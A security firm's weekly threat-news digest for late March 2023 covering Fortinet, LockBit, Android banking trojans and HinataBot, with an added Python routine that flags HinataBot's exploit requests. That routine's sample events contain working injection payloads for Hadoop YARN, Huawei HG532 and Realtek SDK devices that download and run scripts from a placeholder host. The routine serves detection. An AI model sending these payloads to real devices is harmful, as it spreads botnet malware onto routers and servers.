Newsletter For Fourth Week of March 2023

Chinese Hackers Exploit Fortinet Zero-Day Flaw For Cyber Espionage Attack
A suspected Chinese hacking group has been linked to the zero-day exploitation of a now-patched medium-severity security flaw in Fortinet's FortiOS operating system. According to threat intelligence company Mandiant, which made the attribution, the activity cluster is part of a larger campaign to install backdoors on Fortinet and VMware products and maintain persistent access to target environments.

FakeCalls Vishing Malware Targets South Korean Users Via Popular Financial Apps
FakeCalls, an Android voice phishing (vishing) malware operation, has re-emerged to target South Korean users under the guise of more than 20 well-known banking apps. In April 2022, Kaspersky published a report on FakeCalls describing the malware's ability to mimic phone conversations with bank customer service agents.

GoatRAT Android Banking Trojan Targets Mobile Automated Payment System
Another Android banking Trojan capable of making instant unauthorised money transfers is targeting Brazilian banks, part of a growing trend among threat actors to abuse Brazil's Pix instant-payment system. Like BraxDex, Senomorphy and PixPirate before it, the new GoatRAT steals the Pix key from the mobile devices it infects and uses it to make instant payments from compromised accounts, researchers from Cyble revealed in a blog post.

US Government Warns Organizations Of LockBit 3.0 Ransomware Attacks
U.S. government agencies have released a joint cybersecurity advisory detailing the indicators of compromise (IoCs) and tactics, techniques, and procedures (TTPs) associated with the notorious LockBit 3.0 ransomware. LockBit 3.0, a continuation of the LockBit 2.0 and original LockBit variants, "functions as a Ransomware-as-a-Service (RaaS) model," according to the authorities.

Latitude Financial Services Data Breach Impacts 300,000 Customers
Over 300,000 of Latitude Financial Services' customers in Australia have been informed that a data breach may have exposed some of their personal information. A subsidiary of Deutsche Bank and KKR, operating since 2015 and headquartered in Melbourne, Latitude is the largest non-bank provider of consumer credit in Australia and also trades under the Gem Finance brand. The business revealed on Thursday that it had been the victim of a cyberattack that disrupted its operations and resulted in the theft of customer data.

New GoLang-Based HinataBot Exploiting Router And Server Flaws For DDoS Attacks
HinataBot, a new Golang-based botnet, has been observed exploiting known flaws to compromise routers and servers and use them to launch distributed denial-of-service (DDoS) attacks. The malware spreads by exploiting exposed Hadoop YARN servers and security flaws in Realtek SDK devices (CVE-2014-8361) and Huawei HG532 routers (CVE-2017-17215, CVSS score: 8.8).
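Because all three spreading vectors above are unauthenticated HTTP/SOAP requests, the cheapest defensive check is to triage web-proxy or IDS request events for those endpoints and payload shapes. The following Python routine is an added example, not code from the newsletter or from the researchers who documented HinataBot. The ports, paths and payload patterns it matches are the publicly documented exploit forms for the Hadoop YARN ResourceManager REST API, CVE-2017-17215 and CVE-2014-8361; they do not appear on this page and are assumed here. The sample events are constructed.

```python
import re

# Added example. Request signatures for the three HinataBot spreading vectors.
# Ports, endpoint paths and payload shapes are the publicly documented exploit
# forms for these issues (assumed here; they are not taken from the newsletter).
RULES = (
    {
        "name": "hadoop-yarn-unauth-app-submit",
        "port": 8088,
        "path": re.compile(r"^/ws/v1/cluster/apps(?:/new-application)?/?$"),
        # Payload: an application submission whose ApplicationMaster container
        # is told to run an arbitrary shell command.
        "body": re.compile(r'"am-container-spec".*"command"\s*:', re.S),
    },
    {
        "name": "huawei-hg532-cve-2017-17215",
        "port": 37215,
        "path": re.compile(r"^/ctrlt/DeviceUpgrade_1$"),
        # Payload: shell command substitution inside the UPnP upgrade URLs.
        "body": re.compile(r"<New(?:StatusURL|DownloadURL)>[^<]*\$\("),
    },
    {
        "name": "realtek-sdk-cve-2014-8361",
        "port": 52869,
        "path": re.compile(r"^/(?:picsdesc|wanipcn)\.xml$"),
        # Payload: AddPortMapping with a shell metacharacter in NewInternalClient.
        "body": re.compile(r"AddPortMapping.*<NewInternalClient>[^<]*[;`|&$]", re.S),
    },
)


def classify(event):
    """Return (rule_name, verdict) for one request event, or None on no match.

    verdict is "exploit" when the body carries the documented payload and
    "probe" when only the vulnerable endpoint was hit (for example the first
    new-application call of the YARN sequence, or a scanner without a payload).
    Events are plain dicts with keys: src, dst_port, method, path, body.
    """
    if event.get("method", "").upper() != "POST":
        return None
    for rule in RULES:
        if event.get("dst_port") != rule["port"]:
            continue
        if not rule["path"].match(event.get("path", "")):
            continue
        if rule["body"].search(event.get("body", "")):
            return rule["name"], "exploit"
        return rule["name"], "probe"
    return None


def triage(events):
    """Run classify() over a batch and return the hits with their source IPs."""
    hits = []
    for ev in events:
        result = classify(ev)
        if result:
            hits.append({"src": ev.get("src"), "rule": result[0], "verdict": result[1]})
    return hits


# Constructed sample events (not real telemetry): one per vector plus noise.
SAMPLE_EVENTS = [
    {"src": "203.0.113.10", "dst_port": 8088, "method": "POST",
     "path": "/ws/v1/cluster/apps/new-application", "body": ""},
    {"src": "203.0.113.10", "dst_port": 8088, "method": "POST",
     "path": "/ws/v1/cluster/apps",
     "body": '{"application-id":"application_1_0001","application-name":"x",'
             '"am-container-spec":{"commands":{"command":"wget http://198.51.100.5/x.sh -O- | sh"}},'
             '"application-type":"YARN"}'},
    {"src": "203.0.113.11", "dst_port": 37215, "method": "POST",
     "path": "/ctrlt/DeviceUpgrade_1",
     "body": '<?xml version="1.0" ?><s:Envelope><s:Body><u:Upgrade>'
             '<NewStatusURL>$(/bin/busybox wget -g 198.51.100.5 -l /tmp/x -r /x)</NewStatusURL>'
             '<NewDownloadURL>HUAWEIUPNP</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>'},
    {"src": "203.0.113.12", "dst_port": 52869, "method": "POST",
     "path": "/picsdesc.xml",
     "body": '<u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">'
             '<NewInternalClient>`cd /tmp;wget http://198.51.100.5/x.sh;sh x.sh`</NewInternalClient>'
             '</u:AddPortMapping>'},
    {"src": "198.51.100.20", "dst_port": 8088, "method": "GET",
     "path": "/ws/v1/cluster/apps", "body": ""},
    {"src": "198.51.100.21", "dst_port": 80, "method": "POST",
     "path": "/login", "body": "user=a&pass=b"},
]


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"{hit['src']:15} {hit['rule']:30} {hit['verdict']}")
```

The split between "probe" and "exploit" matters operationally: a lone hit on the YARN new-application endpoint or a UPnP path is common scanner noise, whereas a body carrying `$(`, a backtick or an `am-container-spec` command is the actual compromise attempt and should page someone. On a real YARN cluster the stronger fix is not detection at all but never exposing port 8088 to untrusted networks.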

Chinese And Russian Hackers Using SILKLOADER Malware To Evade Detection
Threat activity clusters linked with the Chinese and Russian cybercriminal ecosystems have been observed deploying a new piece of malware designed to load Cobalt Strike onto compromised devices. The malware, named SILKLOADER by Finnish cybersecurity firm WithSecure, uses DLL side-loading to deliver the adversary simulation software.

Warning: AI-generated YouTube Video Tutorials Spreading Infostealer Malware
AI-generated YouTube videos are being widely used by threat actors to spread stealer malware such as Raccoon, RedLine, and Vidar. "The videos entice users by purporting to be tutorials on how to download cracked versions of software such as Photoshop, Premiere Pro, Autodesk 3ds Max, AutoCAD, and other licenced products available only to paid users," CloudSEK researcher Pavan Karthick M explained.

KamiKakaBot Malware Used In Latest Dark Pink APT Attacks On Southeast Asian Targets
The Dark Pink advanced persistent threat (APT) actor has been linked to a new wave of attacks using the KamiKakaBot malware against government and military entities in Southeast Asian countries. The threat actor is thought to be of Asian origin and has been active since at least mid-2021, with a spike in activity in 2022.

Bee-Ware Of Trigona, An Emerging Ransomware Strain
Security researchers first came across the Trigona ransomware strain in late October 2022. By studying Trigona ransomware binaries and ransom notes retrieved from VirusTotal, together with data from Unit 42 incident response engagements, they found that Trigona was particularly active in December 2022, with at least 15 potential victims infected. Businesses in the manufacturing, finance, construction, agriculture, marketing, and high-technology sectors are among those affected.

The TechLab Cyber Security Team, responsible for monitoring, identifying, detecting, protecting, isolating, responding and recovering based on current threats, provides 24x7x365 services. TechLab Security specialises in a range of security products and projects, network devices, end-user devices and systems.

The TechLab Cyber Security Team Major Responsibilities Are:
• Monitor, Analyze, Correlate & Escalate Intrusion Events,
• Develop Appropriate Responses; Protect, Detect, Respond,
• Conduct Incident Management and Forensic Investigation,
• Maintain Security Community Relationships,
• Various Cyber Security Consulting Services such as Penetration Testing, Vulnerability Assessment, PCI-DSS Compliance, and ISO 27001 Implementation and Audit Compliance,
• Assist in Crisis Operations.